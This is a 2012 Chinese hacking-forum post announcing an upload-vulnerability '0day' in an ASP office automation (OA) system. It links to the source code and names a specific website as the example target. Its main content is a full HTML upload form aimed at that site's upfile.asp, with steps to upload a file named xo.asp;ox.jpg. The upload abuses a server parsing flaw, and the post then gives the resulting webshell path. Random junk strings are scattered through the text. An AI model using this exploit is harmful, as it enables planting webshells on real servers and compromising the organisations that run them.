找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2309|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
5 ?/ C1 a+ A5 z  g
- N( Z0 u9 h# \' D- a& y7 ^系统介绍:3 J2 B5 t% `  e

1 v3 Z$ D4 l% q全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
1 c4 a9 k2 ?6 z4 O
& v9 N% v# W! L+ K, T" S主要功能:
! j5 t  u; |% P1 f# @4 y5 \5 y( s公司通告
8 f* B) H# k$ T' w" d& H+ f/ S( Y( H8 _工作计划
( V' p0 A, f: [3 _+ z通讯助理
5 h/ j  [, R2 Q( {# v, A/ f客户资源 2 {) x2 v  W1 @/ K  _! I: A$ }; o
我的公文
5 G2 v3 J5 N/ G* N$ [- n公文传阅
8 ~. k  h" v/ W3 B' m  V' p公共资源 7 C' h+ F$ d7 ~1 I
资源预约
# P4 r6 p7 ?. G& o; O1 Y3 b! o今日考勤 7 x% j5 Z" D/ s6 ]/ o/ Z
个人计划
5 Q  N# S* d2 n! b/ E个人通讯录 0 K# {1 r  d% G' X
个人基本档案
6 p3 J( M- N/ ?. T! f& l; S: Z未读邮件
' E2 F3 m0 z7 h/ n8 N发邮件
/ N( I3 x' D7 z: K' S5 w收件夹
+ }" H, ~$ p  j$ G& h+ i寄件夹 7 J' U! v: @6 M' C/ @! Q
网络硬盘 ) F9 G/ p9 l3 q' b0 B& y
网络会议 - p' @) T& S5 D+ s! z
网络调查
% T1 r% d5 w* j+ b交流论坛
& k% i) m: h( H0 b' e: P0 M3 c$ ~% D. L5 V2 N5 Z+ y" |! S
有兴趣测试的朋友可以下源码看看
1 R$ b# Z9 ^6 m0 q
  F# a  U$ w& m3 t源码下载:% u3 \  O2 f9 G2 v- o5 Y$ ^2 F

7 K0 @* v/ N) S) B+ h/ F+ A4 V6 Bhttp://www.mycodes.net/30/4750.htm
- m2 p+ H2 u( ?' W' N2 _# l7 D
( I, U  E4 h# z: `+ Z漏洞介绍:2 X- B3 O( A5 R
' W" O0 q$ b* x9 W" a4 [
由upfile.asp上传文件漏洞引起7 d3 D+ r4 F) P4 g3 |

, v. y. W  V1 o7 S& S( U3 }, r测试方法:& M) [! O$ Q. B" q( O

# S/ q% P2 Y3 g1 d6 X8 @' k使用名小子上传http://www.itlynn.com/upfile.asp即可
" \* m# `/ t8 i/ [+ ~
; ]) H8 v; B% P( R9 s3 h如果upfile.asp文件被删除不存在。/ l2 R4 z1 s- `1 a6 w" e' |

+ i! h4 @, Q; k4 U. T) \  G  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
: K: v% C. q, @5 b6 K
; m# C( b1 \9 H5 f如果存在那么将如下代码保存为upfile.html。% L% O7 U, |5 d. a& R$ @) t9 h

" ^) S1 f! K9 J1 H2 V然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp2 q9 g0 _1 R* {. ?: f
/ [, @/ u0 w0 P) `, J( E
5 x  ^+ f( `. O- X

: @& J0 }: y4 i01 <table border='0' align="center" cellpadding="5">
1 y/ m6 Q/ |, [# m- Z! |8 ]$ }# S; B2 V! v8 S& q" q: k' J2 r  K; i% G
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> & w" o+ \' X% |8 J

% r9 K/ U- V% Q2 K0 x  r5 I3 U03 <tr>
" D  q" a. {& I  c6 R% N! O
. \8 m% t, m. T" V) n0 g5 k* V9 P04             <td>报错:</td> % z( }/ |9 H8 M# z; K5 k" {, y

6 y/ F8 N" f  B* P; c7 U05             <td><input type='radio' name='errnumber' value='0'> 8 ]3 ?+ Q, G6 V' A- q) E" k

: t4 u- p7 R- s2 U) a06               自动更名
2 x( R& T( o/ z4 g! Q+ `0 A5 }. s
07               <input type='radio' name='errnumber' value='1' checked>
. \- @: U3 N' c% ]! q" r! s5 N  g8 e: J; A( A
08               报错方式
5 B2 I* `5 T# c" N" Z, ~, ], h
3 }" ~0 Q8 x; l* a0 ]  |09               <input type='radio' name='errnumber' value='2'> 9 S0 b: l+ w1 ?: Z. [2 b5 f

# L9 A2 v5 ?5 b) q  b+ y& Q10               直接覆盖</td> 8 `1 I! U$ Z  C. R

: Y/ y! k3 u( k) J& |/ o. `11           </tr>
. @$ w6 U1 c% f8 j+ B, y
9 z$ y* L8 |  M12           <tr>
& B3 l* P. L$ M% T, ?5 c6 G& n6 g! s9 G# H. H6 p
13             <td>主题:</td>
( J3 F9 g5 U- G, d4 T/ k
" g9 H  w2 i5 u; W# P14             <td><input type='text' name='filename' size='30'></td> 4 E  B' ^+ _: B9 {  _- l
$ }2 X* @& a3 B; _: @
15           </tr> 4 V' e3 s/ z- s# J
4 [- v# L6 A" F# ]
16           <tr> / d- x# C: u1 h7 W0 z* O: {8 `
6 w! c, b- Z9 v4 m; _+ H
17             <td>文件:</td> 8 @% h# b) M  ~! S

: N) d4 [* d) G5 k! X7 _5 I18             <td><input type="file"name="fruit"size="30"></td> 5 G9 I& N( \3 N2 h0 h0 b

& a0 G1 x  ~" K19           </tr>
4 a/ m! R* @6 O" D& Z+ D8 R
3 j3 b2 p" y, \  w( q" G0 E20           <tr>
0 S3 T+ q5 R0 r' j
! S3 J& Q7 p2 K+ t5 \2 I: N' l21             <td valign='top'>简介:</td> ( F2 o, ^3 I' g1 e
4 f" h. Q$ b# [( M" {
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> . ^  q* F. Y' t4 X- p4 t
- N. J7 p& ?5 F7 b" K4 R3 `
23           </tr>
/ F) R1 D( e/ _; g1 Y7 p2 j; I* k/ E1 `; m- e, G* k3 L3 ?
24   . r1 Y: b3 X+ H3 J& t
; [0 R) @* C8 L4 Y' v, Z
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
  Z0 `; i* ~! Y% ?8 [2 \* Y
* f. Q" q* K0 N4 E: X3 a% }26           </tr>
( ^( F1 f) S$ A' L" J  ?, `  X* @" I4 h) G+ m
27         </form> ! j" e$ }0 ]' Z# }
* x* U1 Z% C, N8 O: L
然后打开上传一个文件名为xo.asp;ox.jpg的文件。$ R+ f7 d+ e# s

" K/ S7 r4 x* T0 h1 u) J- i; e4 r 9 b* K, h6 e: n4 L7 U

+ Z( a' d" v0 K6 s) T/ h0 l$ ~上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg, N/ V  D. i" {" [& l3 s0 Z
8 C$ {0 f2 f# G( m! W2 \
此漏洞需要配合解析漏洞利用。
3 d9 j! n. G9 N* ?7 K3 R: V; `. _, `
- f7 S6 c$ O$ N& S0 f/ n* _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表